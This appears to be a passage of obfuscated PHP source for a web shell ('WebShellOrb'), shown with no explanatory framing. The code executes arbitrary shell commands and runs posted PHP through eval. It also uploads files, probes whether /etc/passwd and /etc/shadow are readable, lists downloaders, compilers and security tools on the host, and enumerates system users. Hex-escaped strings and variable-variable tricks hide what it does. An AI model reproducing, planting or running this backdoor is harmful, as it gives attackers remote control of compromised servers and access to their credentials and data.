v\x61\x6cue\x3d\x27" . $GLOBALS["\x63\x77\x64"] . "\x27>\n\t\t\x3c\x69n\x70u\x74 t\x79p\x65=\x68i\x64den\x20\x6ea\x6d\x65\x3dp\x31\x20v\x61lue=\x27\x75ploa\x64\x46\x69le\x27>\n\t\t<i\x6ep\x75\x74 \x74\x79\x70\x65\x3d\x68\x69\x64\x64en\x20\x6e\x61me\x3dch\x61\x72\x73\x65\x74 val\x75e\x3d\x27" . (isset($_POST["ch\x61r\x73\x65\x74"]) ? $_POST["\x63\x68arse\x74"] : "") . "\x27\x3e\n\t\t<sp\x61n\x3eU\x70\x6co\x61d f\x69le:</\x73p\x61\x6e\x3e$is_writable\x3c\x62\x72\x3e\x3cinpu\x74\x20c\x6c\x61ss=\x27\x74\x6f\x6fl\x73In\x70'\x20ty\x70\x65=\x66\x69l\x65 na\x6d\x65\x3d\x66><i\x6epu\x74\x20ty\x70\x65=\x73\x75bm\x69\x74\x20v\x61l\x75e='\x3e\x3e\x27\x3e</\x66o\x72\x6d\x3e<\x62r\x20\x20></\x74\x64\x3e\n\t</t\x72>\x3c/ta\x62le>\x3c/d\x69\x76\x3e</b\x6f\x64y\x3e\x3c/\x68t\x6dl>";
}
if (!function_exists("po\x73ix\x5fg\x65t\x70w\x75\x69d") && (strpos($GLOBALS["\x64\x69\x73\x61\x62\x6c\x65\x5ffu\x6ec\x74\x69o\x6es"], "\x70\x6f\x73\x69\x78_\x67etpw\x75\x69d") === false)) {
function posix_getpwuid($p)
{
return false;
}
}
if (!function_exists("\x70o\x73ix\x5fg\x65\x74\x67\x72\x67i\x64") && (strpos($GLOBALS["\x64\x69sabl\x65_fu\x6e\x63\x74\x69\x6fns"], "\x70os\x69x\x5f\x67\x65\x74\x67r\x67i\x64") === false)) {
function posix_getgrgid($p)
{
return false;
}
}
function WebShellOrbEx($in)
{
${${"\x47\x4cO\x42\x41\x4c\x53"}["q\x64u\x72\x71\x6d\x71\x6a\x6d\x62r"]} = "";
$ulvxazrw = "\x66";
if (function_exists("\x65\x78\x65\x63")) {
${"\x47LO\x42\x41\x4c\x53"}["\x70uw\x75a\x6ch\x65\x72"] = "\x6f\x75t";
${"GL\x4fBA\x4cS"}["w\x76n\x66yv\x6e\x77\x67\x62\x6e"] = "ou\x74";
${"G\x4c\x4f\x42A\x4cS"}["\x79\x71\x77w\x6dd\x63e"] = "in";
@exec(${${"G\x4c\x4fB\x41\x4c\x53"}["\x79qw\x77\x6d\x64c\x65"]}, ${${"\x47\x4c\x4fB\x41\x4c\x53"}["q\x64\x75\x72qm\x71\x6a\x6d\x62\x72"]});
${${"\x47\x4c\x4f\x42AL\x53"}["\x70\x75\x77\x75\x61\x6c\x68\x65r"]} = @join("\n", ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77\x76n\x66\x79\x76\x6e\x77\x67b\x6e"]});
} elseif (function_exists("p\x61s\x73t\x68r\x75")) {
${"GL\x4f\x42\x41L\x53"}["\x67\x68\x71\x77\x6c\x73z\x6af\x6b"] = "out";
ob_start();
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x74\x6f\x72\x61\x61\x65\x61\x78l"] = "\x69\x6e";
@passthru(${${"\x47\x4cOB\x41L\x53"}["t\x6fr\x61\x61\x65\x61\x78\x6c"]});
${${"\x47\x4c\x4fB\x41L\x53"}["\x67\x68\x71\x77l\x73\x7aj\x66k"]} = ob_get_clean();
} elseif (function_exists("\x73\x79s\x74em")) {
${"\x47\x4c\x4fBA\x4c\x53"}["m\x61\x74\x79\x6d\x78\x78"] = "i\x6e";
${"G\x4c\x4f\x42\x41\x4c\x53"}["v\x6a\x74\x62w\x6b\x71i\x78"] = "\x6fut";
ob_start();
@system(${${"G\x4cO\x42\x41\x4cS"}["\x6d\x61t\x79\x6d\x78\x78"]});
${${"\x47L\x4f\x42\x41\x4c\x53"}["\x76\x6a\x74b\x77\x6b\x71\x69\x78"]} = ob_get_clean();
} elseif (function_exists("\x73h\x65l\x6c\x5fe\x78\x65c")) {
${"GL\x4f\x42\x41\x4c\x53"}["\x6ep\x63g\x61\x63fo\x6f"] = "i\x6e";
${"G\x4c\x4fBA\x4c\x53"}["\x64\x6a\x6fdn\x6e\x74\x6dr\x6d\x73i"] = "o\x75t";
${${"G\x4c\x4f\x42\x41L\x53"}["\x64jo\x64\x6en\x74m\x72\x6ds\x69"]} = shell_exec(${${"\x47LO\x42AL\x53"}["\x6e\x70\x63\x67\x61\x63f\x6f\x6f"]});
} elseif (is_resource(${$ulvxazrw} = @popen(${${"G\x4c\x4fBA\x4c\x53"}["fnk\x6bdt\x67r"]}, "\x72"))) {
${"\x47\x4cO\x42\x41\x4c\x53"}["\x72\x67\x68i\x6bha\x76t\x63g"] = "\x66";
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["q\x64\x75r\x71\x6d\x71\x6a\x6db\x72"]} = "";
while (!@feof(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x73be\x72\x6cg"]}))
${${"\x47\x4cO\x42ALS"}["\x71\x64\x75\x72\x71\x6d\x71\x6a\x6d\x62\x72"]} .= fread(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x72\x67\x68\x69\x6b\x68\x61\x76\x74\x63g"]}, 1024);
$iemsnbyuveay = "\x66";
pclose(${$iemsnbyuveay});
}
return ${${"G\x4c\x4f\x42\x41LS"}["q\x64\x75\x72\x71mq\x6a\x6d\x62\x72"]};
}
function WebShellOrbViewSize($s)
{
${"G\x4cO\x42\x41\x4c\x53"}["\x67\x69\x6dek\x62fm"] = "\x73";
${"\x47L\x4fB\x41\x4c\x53"}["\x63\x62\x6dexk\x68x\x69c\x79"] = "s";
$dqglmpbjtwd = "\x73";
$vamszp = "\x73";
$jwevteetyqc = "\x73";
$uebsygttsee = "\x73";
${"\x47\x4c\x4f\x42\x41LS"}["\x6em\x70wu\x6d\x78s\x6agp\x61"] = "\x73";
if (is_int(${${"\x47L\x4f\x42\x41\x4c\x53"}["nm\x70\x77\x75\x6d\x78\x73j\x67p\x61"]}))
${$vamszp} = sprintf("%\x75", ${$dqglmpbjtwd});
$rsztkxvkbp = "\x73";
if (${${"\x47L\x4fBA\x4c\x53"}["\x75\x6f\x70\x75\x70\x67\x79"]} >= 1073741824)
return sprintf("%1.2f", ${${"G\x4cO\x42\x41LS"}["uo\x70\x75\x70gy"]} / 1073741824) . "\x20\x47B";
elseif (${$uebsygttsee} >= 1048576)
return sprintf("%\x31\x2e2f", ${$jwevteetyqc} / 1048576) . "\x20\x4dB";
elseif (${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67i\x6d\x65\x6bb\x66m"]} >= 1024)
return sprintf("\x25\x31\x2e\x32\x66", ${${"GL\x4fB\x41\x4c\x53"}["\x63bm\x65\x78k\x68x\x69\x63\x79"]} / 1024) . " KB";
else
return ${$rsztkxvkbp} . "\x20B";
}
function WebShellOrbPerms($p)
{
$qwyrtxgnisf = "p";
$lreavxykf = "i";
$ctwfzevrci = "p";
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71t\x64\x73\x79e\x67"] = "p";
$mhcxeci = "i";
$auktcgubws = "p";
$alkqtmvu = "p";
${"\x47\x4cOBA\x4cS"}["\x6eh\x6cv\x6b\x76rl"] = "i";
$ilolonrsko = "\x70";
$vlkybhpqjn = "p";
${"G\x4cOBA\x4c\x53"}["\x69\x64\x78\x68\x72\x75\x7a\x65\x75\x74\x74\x69"] = "\x70";
${"\x47L\x4fB\x41\x4cS"}["\x6b\x79\x68\x62\x69\x6c\x74\x66i"] = "p";
${"\x47\x4c\x4f\x42\x41L\x53"}["\x6f\x68j\x61\x64\x69\x75\x70\x64\x74\x6f"] = "i";
$qkybts = "p";
$iwcqbfpgngg = "\x70";
${"\x47\x4cOB\x41\x4c\x53"}["olq\x66\x6d\x6b\x65n\x67z"] = "p";
$jupethhvkj = "\x70";
if ((${${"\x47LO\x42A\x4c\x53"}["\x76\x77\x68n\x6d\x76\x62\x7a\x6duqd"]} & 0xC000) == 0xC000)
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x6c\x6buy\x6fj\x6a"]} = "\x73";
elseif ((${$auktcgubws} & 0xA000) == 0xA000)
${$lreavxykf} = "\x6c";
elseif ((${$alkqtmvu} & 0x8000) == 0x8000)
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63l\x6b\x75\x79o\x6a\x6a"]} = "-";
elseif ((${${"\x47LOB\x41\x4c\x53"}["q\x74d\x73y\x65\x67"]} & 0x6000) == 0x6000)
${${"GL\x4fB\x41L\x53"}["\x63\x6ck\x75\x79\x6f\x6a\x6a"]} = "b";
elseif ((${${"\x47\x4cO\x42\x41\x4cS"}["\x76\x77\x68\x6e\x6d\x76\x62\x7amu\x71\x64"]} & 0x4000) == 0x4000)
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6eh\x6c\x76\x6b\x76\x72l"]} = "d";
elseif ((${$ctwfzevrci} & 0x2000) == 0x2000)
${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x63lku\x79ojj"]} = "c";
elseif ((${$vlkybhpqjn} & 0x1000) == 0x1000)
${$mhcxeci} = "\x70";
else
${${"\x47\x4cOB\x41\x4cS"}["\x63l\x6bu\x79\x6fj\x6a"]} = "\x75";
${${"\x47L\x4fB\x41LS"}["clk\x75y\x6f\x6aj"]} .= ((${${"\x47LO\x42\x41L\x53"}["\x6by\x68\x62ilt\x66\x69"]} & 0x0100) ? "r" : "-");
${${"\x47\x4c\x4fBA\x4cS"}["\x63l\x6b\x75\x79\x6f\x6aj"]} .= ((${${"\x47\x4cOBALS"}["\x76\x77hn\x6d\x76b\x7a\x6du\x71\x64"]} & 0x0080) ? "\x77" : "-");
${"\x47L\x4f\x42A\x4cS"}["yx\x63njhn"] = "\x69";
${${"G\x4c\x4fB\x41\x4c\x53"}["\x6f\x68j\x61d\x69\x75\x70\x64to"]} .= ((${$ilolonrsko} & 0x0040) ? ((${${"GL\x4fB\x41\x4c\x53"}["\x76\x77\x68nm\x76\x62z\x6d\x75\x71d"]} & 0x0800) ? "s" : "x") : ((${${"\x47\x4c\x4fB\x41L\x53"}["\x76\x77h\x6e\x6d\x76\x62\x7a\x6duqd"]} & 0x0800) ? "S" : "-"));
${${"GL\x4f\x42\x41L\x53"}["\x63l\x6b\x75y\x6f\x6a\x6a"]} .= ((${$qkybts} & 0x0020) ? "r" : "-");
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x68sx\x76\x74\x6e"] = "p";
${${"G\x4c\x4f\x42A\x4cS"}["\x63l\x6b\x75\x79o\x6a\x6a"]} .= ((${${"\x47\x4c\x4f\x42ALS"}["\x76\x77\x68\x6e\x6d\x76\x62\x7a\x6d\x75\x71\x64"]} & 0x0010) ? "\x77" : "-");
${${"GL\x4f\x42\x41\x4cS"}["\x79\x78\x63n\x6a\x68\x6e"]} .= ((${${"GLOB\x41\x4cS"}["v\x77\x68\x6e\x6d\x76\x62\x7a\x6d\x75\x71d"]} & 0x0008) ? ((${${"GL\x4f\x42A\x4c\x53"}["shs\x78\x76t\x6e"]} & 0x0400) ? "s" : "x") : ((${$iwcqbfpgngg} & 0x0400) ? "\x53" : "-"));
${${"\x47\x4cO\x42\x41\x4cS"}["\x63\x6c\x6b\x75\x79\x6fj\x6a"]} .= ((${${"\x47\x4c\x4f\x42A\x4cS"}["id\x78\x68\x72\x75\x7a\x65u\x74\x74i"]} & 0x0004) ? "\x72" : "-");
${${"\x47\x4cO\x42\x41\x4cS"}["\x63lk\x75y\x6fj\x6a"]} .= ((${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["o\x6c\x71f\x6d\x6be\x6e\x67z"]} & 0x0002) ? "w" : "-");
${${"\x47L\x4f\x42\x41\x4c\x53"}["\x63\x6cku\x79\x6f\x6aj"]} .= ((${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x76\x77\x68n\x6d\x76\x62\x7a\x6d\x75q\x64"]} & 0x0001) ? ((${$qwyrtxgnisf} & 0x0200) ? "\x74" : "\x78") : ((${$jupethhvkj} & 0x0200) ? "\x54" : "-"));
return ${${"GLO\x42A\x4c\x53"}["\x63l\x6b\x75\x79\x6f\x6a\x6a"]};
}
function WebShellOrbPermsColor($f)
{
$hfgpvmt = "f";
${"\x47L\x4f\x42\x41LS"}["\x77ma\x6bj\x71c\x74\x76r"] = "\x66";
${"\x47L\x4f\x42A\x4c\x53"}["pi\x67\x79\x75\x6fr\x68\x6b"] = "\x66";
if (!@is_readable(${${"GL\x4f\x42ALS"}["\x70i\x67\x79\x75\x6f\x72\x68k"]}))
return "\x3cfont \x63\x6f\x6co\x72=#FF000\x30\x3e" . WebShellOrbPerms(@fileperms(${$hfgpvmt})) . "\x3c/\x66\x6fnt\x3e";
elseif (!@is_writable(${${"\x47LOB\x41L\x53"}["\x77\x6d\x61\x6b\x6a\x71c\x74v\x72"]}))
return "\x3c\x66on\x74\x20c\x6f\x6co\x72=w\x68i\x74\x65>" . WebShellOrbPerms(@fileperms(${${"G\x4cOBALS"}["\x73\x62\x65\x72\x6c\x67"]})) . "</fo\x6et\x3e";
else
return "\x3cfo\x6e\x74 \x63\x6fl\x6fr\x3d\x2325ff\x30\x30\x3e" . WebShellOrbPerms(@fileperms(${${"\x47LO\x42A\x4cS"}["\x73\x62\x65r\x6cg"]})) . "\x3c/\x66on\x74\x3e";
}
function WebShellOrbScandir($dir)
{
if (function_exists("sc\x61n\x64i\x72")) {
return scandir(${${"G\x4c\x4f\x42A\x4c\x53"}["\x6c\x65uw\x75\x6d\x74"]});
} else {
$otrhvbrub = "d\x68";
$psbyngpqum = "\x64\x69\x72";
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x69s\x63\x67\x72\x76\x79vt"] = "f\x69\x6ce\x73";
${${"\x47\x4c\x4fB\x41LS"}["\x71\x75bwk\x62"]} = opendir(${$psbyngpqum});
while (false !== (${${"\x47\x4cO\x42\x41\x4c\x53"}["\x72\x62\x61\x73qp"]} = readdir(${$otrhvbrub})))
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x79\x6c\x75x\x65\x63l\x6c"]}[] = ${${"\x47\x4cOB\x41LS"}["\x72\x62\x61\x73qp"]};
return ${${"G\x4c\x4f\x42\x41\x4cS"}["\x69\x73\x63\x67\x72\x76\x79v\x74"]};
}
}
function WebShellOrbWhich($p)
{
$xtktpfotwm = "\x70\x61\x74\x68";
$sdrdcmtgqy = "path";
$xawrvw = "\x70\x61\x74\x68";
${$xtktpfotwm} = WebShellOrbEx("\x77h\x69ch\x20" . ${${"G\x4c\x4f\x42\x41\x4cS"}["v\x77\x68\x6e\x6d\x76b\x7a\x6duq\x64"]});
if (!empty(${$sdrdcmtgqy}))
return ${$xawrvw};
return false;
}
function actionSecInfo()
{
$domtksocnh = "temp";
WebShellOrbHeader();
echo "\x3ch\x31\x3eSe\x72v\x65r\x20\x73\x65\x63\x75\x72\x69\x74\x79 in\x66o\x72mati\x6f\x6e</h1\x3e\x3c\x64\x69v \x63l\x61\x73\x73\x3dco\x6e\x74en\x74\x3e";
function WebShellOrbSecParam($n, $v)
{
$nhauwowc = "\x76";
${${"\x47\x4c\x4f\x42A\x4cS"}["v\x76dx\x6d\x6abgec"]} = trim(${$nhauwowc});
if (${${"GL\x4fB\x41\x4c\x53"}["\x76\x76d\x78m\x6a\x62\x67ec"]}) {
echo "\x3c\x73p\x61\x6e>" . ${${"\x47\x4cO\x42A\x4cS"}["o\x6e\x6dd\x72\x78"]} . ":\x20</\x73\x70\x61n\x3e";
$hvsxdsrcv = "\x76";
if (strpos(${$hvsxdsrcv}, "\n") === false)
echo ${${"G\x4c\x4fB\x41\x4cS"}["\x76\x76\x64\x78\x6d\x6ab\x67\x65\x63"]} . "\x3cbr>";
else
echo "<p\x72e \x63l\x61\x73\x73\x3dml\x31\x3e" . ${${"\x47\x4c\x4fB\x41L\x53"}["\x76\x76\x64\x78\x6d\x6ab\x67\x65\x63"]} . "</\x70re>";
}
}
WebShellOrbSecParam("\x53\x65\x72\x76\x65r\x20s\x6ff\x74w\x61\x72\x65", @getenv("SE\x52VE\x52_\x53\x4f\x46\x54W\x41\x52\x45"));
if (function_exists("\x61pac\x68e_\x67et_\x6dod\x75l\x65\x73"))
WebShellOrbSecParam("Loa\x64e\x64 \x41\x70a\x63he modul\x65s", implode(", ", apache_get_modules()));
WebShellOrbSecParam("\x44i\x73\x61\x62l\x65d P\x48\x50\x20\x46\x75nct\x69\x6fn\x73", $GLOBALS["di\x73\x61\x62\x6c\x65\x5ffu\x6ecti\x6fn\x73"] ? $GLOBALS["\x64isa\x62l\x65\x5ff\x75nctio\x6es"] : "\x6e\x6fne");
WebShellOrbSecParam("\x4f\x70en b\x61s\x65\x20\x64\x69\x72", @ini_get("o\x70en_b\x61\x73e\x64i\x72"));
WebShellOrbSecParam("S\x61\x66e\x20\x6dode\x20ex\x65\x63 d\x69r", @ini_get("safe_\x6do\x64\x65\x5f\x65xe\x63_\x64ir"));
${"\x47LO\x42A\x4c\x53"}["\x79\x64\x68\x68bkw\x79\x64"] = "te\x6d\x70";
WebShellOrbSecParam("\x53af\x65 \x6dod\x65\x20\x69n\x63\x6c\x75\x64e\x20\x64ir", @ini_get("saf\x65\x5fmod\x65\x5f\x69n\x63l\x75\x64e_dir"));
WebShellOrbSecParam("c\x55R\x4c s\x75\x70p\x6fr\x74", function_exists("\x63\x75r\x6c\x5fv\x65\x72si\x6fn") ? "ena\x62\x6ced" : "n\x6f");
${"\x47\x4c\x4f\x42\x41L\x53"}["\x6f\x62\x78tsb\x6bf"] = "\x74e\x6dp";
${${"GLOBA\x4c\x53"}["\x6d\x65\x72\x63\x67\x6d\x64w\x65"]} = array();
if (function_exists("my\x73\x71l_\x67\x65\x74_\x63\x6c\x69\x65\x6e\x74\x5f\x69n\x66\x6f"))
${${"\x47\x4c\x4fB\x41L\x53"}["me\x72c\x67\x6d\x64\x77\x65"]}[] = "\x4dy\x53ql\x20(" . mysql_get_client_info() . ")";
if (function_exists("\x6dssq\x6c\x5fco\x6en\x65\x63t"))
${${"\x47LOBA\x4c\x53"}["\x6d\x65\x72\x63g\x6ddwe"]}[] = "\x4d\x53\x53\x51\x4c";
if (function_exists("\x70g_\x63on\x6e\x65c\x74"))
${${"\x47LO\x42\x41\x4c\x53"}["\x79\x64\x68h\x62\x6b\x77\x79\x64"]}[] = "\x50o\x73\x74gre\x53QL";
if (function_exists("oc\x69\x5f\x63\x6f\x6e\x6e\x65\x63t"))
${${"\x47\x4c\x4fB\x41L\x53"}["\x6f\x62x\x74sb\x6bf"]}[] = "Or\x61cl\x65";
WebShellOrbSecParam("Su\x70p\x6frt\x65\x64 \x64\x61\x74a\x62\x61\x73\x65\x73", implode(",\x20", ${$domtksocnh}));
echo "\x3cb\x72>";
if ($GLOBALS["\x6fs"] == "n\x69\x78") {
WebShellOrbSecParam("\x52eada\x62\x6c\x65\x20/e\x74c/\x70as\x73\x77\x64", @is_readable("/etc/\x70a\x73\x73wd") ? "y\x65\x73 <a href=\x27\x23' \x6f\x6ecl\x69\x63k='g(\"F\x69\x6c\x65\x73\x54o\x6f\x6cs\", \x22/e\x74c/\", \"pas\x73wd\")\x27\x3e[v\x69\x65\x77]\x3c/a>" : "\x6e\x6f");
WebShellOrbSecParam("\x52\x65\x61\x64abl\x65\x20/e\x74\x63/s\x68adow", @is_readable("/\x65t\x63/s\x68\x61d\x6f\x77") ? "y\x65s <a\x20hr\x65\x66\x3d'#'\x20\x6fn\x63l\x69\x63\x6b\x3d'g(\x22Fi\x6c\x65\x73\x54o\x6f\x6c\x73\",\x20\"/etc/\x22, \"\x73\x68\x61\x64o\x77\x22)'>[\x76i\x65w]</\x61>" : "n\x6f");
WebShellOrbSecParam("\x4fS ve\x72\x73\x69\x6f\x6e", @file_get_contents("/pro\x63/\x76\x65r\x73i\x6fn"));
WebShellOrbSecParam("\x44\x69\x73t\x72 \x6e\x61me", @file_get_contents("/e\x74\x63/\x69\x73su\x65\x2e\x6e\x65\x74"));
if (!$GLOBALS["s\x61\x66\x65\x5fm\x6f\x64e"]) {
$ydxmggcqmkt = "u\x73\x65\x72f\x75\x6c";
$dvbwwqcdpb = "\x75\x73e\x72f\x75\x6c";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x65y\x72\x62\x6dl\x6d"] = "\x64\x6f\x77\x6e\x6c\x6fad\x65\x72s";
${$dvbwwqcdpb} = array(
"\x67c\x63",
"l\x63c",
"cc",
"ld",
"\x6dak\x65",
"\x70\x68p",
"p\x65\x72\x6c",
"py\x74\x68on",
"\x72u\x62y",
"\x74\x61\x72",
"\x67zi\x70",
"bzi\x70",
"\x62zip\x32",
"\x6e\x63",
"\x6co\x63\x61\x74e",
"sui\x64p\x65\x72\x6c"
);
${"\x47\x4cOB\x41\x4c\x53"}["\x63gkq\x79\x72"] = "t\x65mp";
${"G\x4cO\x42AL\x53"}["\x6cgub\x69x\x6cbyz\x64\x6b"] = "\x74\x65\x6d\x70";
${${"\x47\x4cO\x42\x41\x4cS"}["p\x68\x67\x6a\x79tx"]} = array(
"ka\x76",
"nod\x33\x32",
"bdco\x72ed",
"\x75v\x73c\x61n",
"\x73a\x76",
"drw\x65b\x64",
"clamd",
"\x72\x6b\x68\x75\x6e\x74e\x72",
"c\x68\x6b\x72\x6fot\x6b\x69\x74",
"i\x70t\x61\x62\x6c\x65s",
"ipfw",
"\x74r\x69\x70wire",
"shi\x65ldcc",
"\x70or\x74sen\x74\x72\x79",
"s\x6eo\x72t",
"\x6f\x73\x73e\x63",
"\x6cid\x73\x61dm",
"t\x63plo\x64g",
"s\x78id",
"l\x6fgc\x68eck",
"\x6c\x6fgw\x61t\x63h",
"\x73\x79smask",
"zm\x62s\x63a\x70",
"s\x61\x77\x6dil\x6c",
"w\x6f\x72\x6ds\x63a\x6e",
"n\x69\x6eja"
);
${${"\x47L\x4fB\x41\x4c\x53"}["e\x79r\x62\x6d\x6cm"]} = array(
"w\x67\x65\x74",
"f\x65\x74c\x68",
"lyn\x78",
"li\x6e\x6b\x73",
"\x63u\x72\x6c",
"\x67\x65\x74",
"\x6c\x77p-mir\x72\x6fr"
);
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x66bb\x67\x73\x78\x65zkw"] = "\x64\x6fwnl\x6f\x61d\x65rs";
echo "<b\x72\x3e";
${${"G\x4c\x4f\x42A\x4cS"}["\x63\x67k\x71y\x72"]} = array();
${"G\x4c\x4f\x42\x41LS"}["\x6bi\x65\x61\x62y\x7a\x70e"] = "i\x74e\x6d";
$cwtvyfrpbof = "te\x6d\x70";
foreach (${$ydxmggcqmkt} as ${${"\x47LO\x42\x41\x4c\x53"}["\x6bi\x65\x61b\x79zp\x65"]}) {
$ivvheocsptu = "t\x65\x6d\x70";
if (WebShellOrbWhich(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x62\x64\x6d\x71\x77q\x76\x66\x71\x6e"]}))
${$ivvheocsptu}[] = ${${"\x47\x4c\x4fBA\x4c\x53"}["\x62d\x6dq\x77\x71vfq\x6e"]};
}
WebShellOrbSecParam("\x55se\x72f\x75l", implode(", ", ${$cwtvyfrpbof}));
${"G\x4cO\x42\x41\x4cS"}["\x6f\x75\x62\x64\x66q\x64\x78\x6a"] = "t\x65\x6d\x70";
${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6c\x67u\x62\x69\x78l\x62\x79\x7ad\x6b"]} = array();
$mtkmrotbjk = "\x74e\x6d\x70";
foreach (${${"\x47\x4cOB\x41L\x53"}["\x70h\x67\x6a\x79\x74\x78"]} as ${${"\x47LOB\x41\x4c\x53"}["\x62\x64mqw\x71\x76\x66\x71n"]}) {
$lkqsebumlt = "\x69\x74e\x6d";
$ymipnakanypt = "t\x65\x6d\x70";
if (WebShellOrbWhich(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["b\x64\x6dqwq\x76\x66\x71\x6e"]}))
${$ymipnakanypt}[] = ${$lkqsebumlt};
}
WebShellOrbSecParam("\x44\x61\x6eg\x65r", implode(",\x20", ${${"\x47\x4c\x4fB\x41L\x53"}["me\x72\x63\x67\x6ddwe"]}));
${${"GLOBA\x4c\x53"}["o\x75bd\x66\x71\x64x\x6a"]} = array();
foreach (${${"\x47\x4cO\x42\x41L\x53"}["\x66b\x62\x67\x73\x78\x65\x7a\x6bw"]} as ${${"G\x4c\x4f\x42\x41LS"}["\x62\x64\x6d\x71\x77\x71\x76fq\x6e"]}) {
${"\x47LO\x42\x41\x4c\x53"}["\x6fe\x71q\x68\x72cm\x70\x69"] = "i\x74e\x6d";
if (WebShellOrbWhich(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x65\x71\x71\x68rcm\x70i"]}))
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x65rc\x67\x6dd\x77\x65"]}[] = ${${"\x47\x4cOB\x41\x4cS"}["bdm\x71\x77qv\x66\x71n"]};
}
WebShellOrbSecParam("D\x6fwnloa\x64\x65r\x73", implode(",\x20", ${$mtkmrotbjk}));
echo "\x3c\x62r/\x3e";
WebShellOrbSecParam("\x48DD\x20spac\x65", WebShellOrbEx("df\x20-\x68"));
WebShellOrbSecParam("H\x6f\x73t\x73", @file_get_contents("/\x65tc/\x68\x6f\x73ts"));
echo "<b\x72/\x3e\x3c\x73p\x61n>pos\x69x_\x67\x65\x74\x70w\x75\x69d (\"R\x65a\x64\x22 /etc/p\x61ss\x77d)\x3c/\x73p\x61\x6e>\x3c\x74\x61ble\x3e<fo\x72\x6d \x6fns\x75bm\x69t=\x27\x67(\x6e\x75\x6cl,\x6eu\x6cl,\x225\",thi\x73.p\x61ram1.va\x6cue,t\x68is\x2e\x70\x61\x72\x61m2\x2evalu\x65);r\x65t\x75\x72n\x20fa\x6cse\x3b'>\x3c\x74\x72\x3e\x3c\x74\x64\x3e\x46rom\x3c/td>\x3c\x74\x64><\x69npu\x74 \x74ype\x3d\x74\x65\x78\x74\x20\x6eame\x3dpa\x72\x61m1\x20va\x6cue\x3d\x30\x3e\x3c/\x74\x64\x3e\x3c/\x74\x72\x3e<\x74\x72\x3e\x3c\x74d>\x54o\x3c/t\x64><\x74d\x3e<\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3dtext nam\x65=\x70\x61r\x61\x6d2 \x76a\x6cu\x65=1\x30\x30\x30\x3e\x3c/\x74\x64>\x3c/\x74r\x3e</\x74abl\x65\x3e\x3c\x69\x6e\x70\x75t t\x79\x70e\x3dsu\x62\x6dit\x20v\x61lue\x3d\">>\x22></\x66or\x6d>";
if (isset($_POST["\x70\x32"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p\x33"])) {
${"\x47\x4cOB\x41L\x53"}["f\x79l\x6c\x73u\x78\x69\x67\x6b"] = "\x74\x65m\x70";
${${"\x47\x4c\x4fB\x41\x4cS"}["\x66\x79\x6c\x6c\x73\x75\x78i\x67\x6b"]} = "";
$ycgoqwhau = "te\x6d\x70";
for (; $_POST["\x702"] <= $_POST["p\x33"]; $_POST["\x702"]++) {
$yntzsuru = "u\x69\x64";
$llkcgbksjw = "\x75id";
${"\x47L\x4f\x42\x41L\x53"}["\x77\x6d\x75\x70\x64\x73\x71\x68yt"] = "u\x69\x64";
${$yntzsuru} = @posix_getpwuid($_POST["\x70\x32"]);
if (${${"\x47\x4cO\x42\x41L\x53"}["\x77m\x75\x70d\x73\x71hy\x74"]})
${${"\x47L\x4f\x42\x41L\x53"}["\x6d\x65\x72\x63\x67m\x64w\x65"]} .= join(":", ${$llkcgbksjw}) . "\n";
}
echo "<b\x72/>";
WebShellOrbSecParam("U\x73er\x73", ${$ycgoqwhau});
}
}
} else {
WebShellOrbSecParam("O\x53\x20V\x65r\x73io\x6e", WebShellOrbEx("\x76er"));
WebShellOrbSecParam("Account S\x65tt\x69ng\x73", WebShellOrbEx("\x6ee\x74 \x61cc\x6funts"));
WebShellOrbSecParam("Us\x65r\x20\x41\x63\x63\x6fu\x6e\x74\x73", WebShellOrbEx("\x6eet\x20\x75se\x72"));
}
echo "\x3c/\x64iv\x3e";
WebShellOrbFooter();
}
function actionPhp()
{
if (isset($_POST["\x61\x6aa\x78"])) {
WebShellOrbsetcookie(md5($_SERVER["HTT\x50_\x48O\x53\x54"]) . "aj\x61\x78", true);
ob_start();
eval($_POST["p\x31"]);
${${"GL\x4f\x42\x41L\x53"}["\x6de\x72\x63g\x6d\x64\x77\x65"]} = "\x64o\x63um\x65nt\x2e\x67et\x45\x6ceme\x6e\x74\x42yI\x64('P\x68p\x4f\x75\x74put\x27).s\x74\x79le.\x64\x69sp\x6c\x61\x79=\x27\x27;doc\x75\x6d\x65\x6et\x2eg\x65t\x45l\x65\x6de\x6etB\x79Id('\x50h\x70Ou\x74p\x75t\x27).\x69nn\x65rHT\x4dL\x3d'" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\\x27\0") . "';\n";
$qpbfjuxdtq = "t\x65\x6dp";
echo strlen(${$qpbfjuxdtq}), "\n", ${${"\x47\x4cOB\x41LS"}["\x6d\x65\x72\x63\x67m\x64\x77e"]};
exit;
}
if (empty($_POST["aj\x61\x78"]) && !empty($_POST["p1"]))
WebShellOrbsetcookie(md5($_SERVER["\x48\x54TP_HO\x53\x54"]) . "\x61\x6a\x61\x78", 0);
WebShellOrbHeader();
if (isset($_POST["p2"]) && ($_POST["\x70\x32"] == "inf\x6f")) {
echo "\x3c\x68\x31>P\x48\x50\x20info</h1\x3e<di\x76\x20\x63\x6c\x61ss\x3dc\x6f\x6e\x74\x65n\x74><style\x3e\x2ep {c\x6f\x6c\x6f\x72:#000\x3b}</\x73t\x79le>";
ob_start();
phpinfo();
